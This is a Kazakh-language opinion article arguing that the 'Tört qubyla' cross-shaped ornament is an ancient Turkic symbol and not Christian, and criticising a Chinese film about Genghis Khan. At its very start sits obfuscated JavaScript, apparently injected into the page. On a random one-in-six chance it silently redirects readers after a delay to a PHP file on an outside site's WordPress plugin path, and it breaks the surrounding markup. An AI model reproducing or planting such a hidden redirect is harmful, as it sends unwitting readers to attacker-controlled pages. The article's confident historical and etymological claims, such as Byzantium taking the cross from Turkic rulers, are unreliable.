2022-05-24

»Төрт құбыла» мен кресті шатастырып алмайық

         $nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom: 0pt;»> Мынаны түсінгеніміз абзал. Сол кезеңдерде сауда-саттық дамыған  «Ұлы Жібек Жолы» бойындағы  қалалар мен елді мекендерде, керуен сарайларда түрлі діндер ұстаған алыс мемлекеттерден уақытша келген халықтардың да тұрғандығы белгілі.Сондықтан да  шіркеулердің табылуы Ұлы түркілердің сол  дінді ұстап қатып қалды дегендігін білдірмейді. Және Ұлы Бабаларымыз басқа көктен кітап түскен діндерді ұстағандарға түсіністікпен қарағандығын, бірақ өз діндерін түркілердің арасына алдап-арбаумен, зорлықпен таратпақ болғандарды қатаң түрде алмас қылыштың  жүзіне тапсырып отырғандығын да ескеруіміз керек.

                Біреу байқап, біреу байқамайды, еліміздің теледидарларында соңғы кезде көрсетіліп жатқан Қытай Халық Республикасында түсірілген Ұлы Әмірші Шыңғыс хан туралы фильмде Найман, Керей тайпаларын христиан  дініне сиынушы деп көрсетеді. Бұл да жаңсақ, қате пікір. Мұны батыс
зерттеушілері мен Ұлы державалардың бұл бұрыннан, тереңнен ойланып стратегиялық саясатына негізделген келешекке қате  пікірлер туғызу үшін жазып қалдырылған  деректері деп түсінуіміз керек. Және бұл фильмдердің қазіргі елімізде көп дін таратып жүргендердің таптырмайтын үгіт-насихат құралына айналуына жол бермеуіміз керек. Оны көрген баптистер, көрдің бе, «Ата-бабаларың осы дінді ұстанған!» — дейді, Иегова және христиан дінінің басқа да ағымдарын таратып жүргендердің  көктен іздегендері жерден табылып, танып-білгендерін өз мүдделеріне қарай бұрмалап ала қояды. Ал, фильмді көрген санасы мен білімі толыса қоймаған жас пен жасамыс, «солай болуы да мүмкін ғой» деп ойын көпгенімен дәйектеуі ықтимал . Сондықтан да бұл фильмдердің кейбір тарихи шындықтарды бұрмалаған күйі түсіргенін айтып отыруымыз керек.

  «Төрт Құбыла»-ның маңызы

Шынын айтайық,«Төрт Құбыла»-бұл қазіргі крест тәрізді белгі. Бірақ ол крестен бұрын пайда болған, өзіміздің төл белгіміз. Ұлы Бабаларымыз: «Төрт құбылаң түгел болсын!!!» — деп, бір-біріне ізгі тілектер айтқан. Бұл белгі ұлттық ою-өрнектерімізге, кілемдер мен алашаларға, киіз үйлердің басқұр, желдік, таңғыштарына да салынған. Шаңырақтың күлдіреуіштерінде, қазақтың бас киімі «Ақ қалпақта» да «Төрт құбыланың» орын тауып тұруы да тегін емес. Түркістандағы «Әзірет Сұлтан» кесенесінің батыс жағындағы ою-өрнектерде де осы «Төрт Құбыланы» білдіретін крест тәрізді, халқымыз үшінқасиетті саналған белгілер кескінделген.

Бұл крестердің христиан дініне ешбір қатысы жоқ. Ежелгі замандардан осы белгі біздің жерімізде, төрімізде тұрған. Киімдердегі, ат әбзелдеріндегі оюлармен қатар, той мен салтанаттарда Ұлы патшаларымыз бен Қағанатбасы, Ұлысбасылар киетін алтын мен күмістен жасалған сауыттардың құрамдас бөлігі болып табылатын алтын, күміс дулығалардың маңдай алды да да крест тәрізді «Төртқұбыла» белгісімен әшекейленген. Дөңгелек киіз үйдің шаңырағының ортасындағы осы белгі кейіннен Ұлы Бабамыздың атымен «Алаш» таңбасы — деп аталып, заманында Ұлы Хандардың, Ұлы Билердің, Ұлы Батырлардың алтын шынжырға ілініп тағылатын киелі «Төс белгісі» болған. Күшті де, қуатты
ежелгі түркі империяларының осындай керемет белгі, таңбаларын көріп, қасиетіне сеніп киелі санаған Үрім (Византия) Елінің елшілері мен билеушілері бұл белгілерді өздері де пайдалана бастап, кейін бұл белгі христиан дінінің басты белгісі, рәміздеріне (атрибутика, символ, орден, медаль) айналған.

 «Уәскей» — сөзінің түп-төркіні

 Осы Қытай фильміндегі Шыңғысханның әкесі Есугей туралы да бірер сөз. Мұндағы басты қателік, заманында осы деректерді зерттеген батыс зерттеушілерінің ежелгі Сақ тіліндегі «Уәскей» — сөзінің түп-төркініне  түсінбей, Темуршын — Шыңғысханның әкесін осылай атайтындығында. Алайда бұл сөздің түп мағанасы «Әкесіз» туған, яғни әкесінен анасының құрсағында  жатқанда айырылған, «Егесіз», «Бас иесі жоқ» — деген ұғымды білдірген. Бұл сөздің сол замандағы синонимі  «Төре» деген сөз. Бұл да кіндік пен құрсақтың ортасында келген ұл деген ұғым. Ал Сақ тіліндегі «Екей»- деген сөз, анасыз деген ұғымда айтылған. Бұл сөздің кейін «Өгейге» айналғанын, бұл уақиғаларды зерттеуді бірнеше жүз жылдардан кейін бастаған  батыс тарихшы, зерттеушілері қайдан білсін…

Бұл ҰлыТектілердей әділетті де, турашыл бола алмаған, қарамағындағы елдерінде олар сияқты кедейшілікті жоя алмаған, олардың атақ-даңқтарын көре алмаған кейінгі замандардағы билеушілерінің бұрмаланған жазбаларына сүйеніп жасалған қитұрқы әрекеттері деп тануымыз  керек. Бұл уақиғалар жайлы Ұлы Төле Бидің, Жоталы Шалқы Бимен екеуінің арасындағы әңгімелерде жан-жақты айтылған.

Біз киелі Ұлы Даланың перзенттері Қазақтар және басқа да Елімізді Отаным деп таныған ұлттар мен ұлыстар, Ұлы Бабаларымыздың аманаты жеріміз бен бұлжытпай орындалуға тиісті салт-дәстүрлеріміз бен рәсімдерімізге адалдығымызды берік ұстап,
тілімізді, дінімізді, ділімізді, мәдениетімізді болашақ ұрпаққа таза күйінде жеткізуіміз керек! Сонда ғана халық болып қаламыз! Өзіндік болмыс, бет-бейнемізді сақтап қалу бүгінгі күннің ең басты өзекті мәселесі боп тұр. Сондықтанда мемлекетіміздің идеологиялық қауіпсіздігі ойыншық емес деп, ізгі ойымыз бен айтарымызды қорытындылауды жөн  көрдік.

 Ілесбек Байжанов. Шымкент шаһары.

Оңтүстік Қазақстан облысының «Ақиқат – 1» қоғамдық ұйымының төрағасы

«Қызмет» ақпарат.

{jcomments on}

Яндекс.Метрика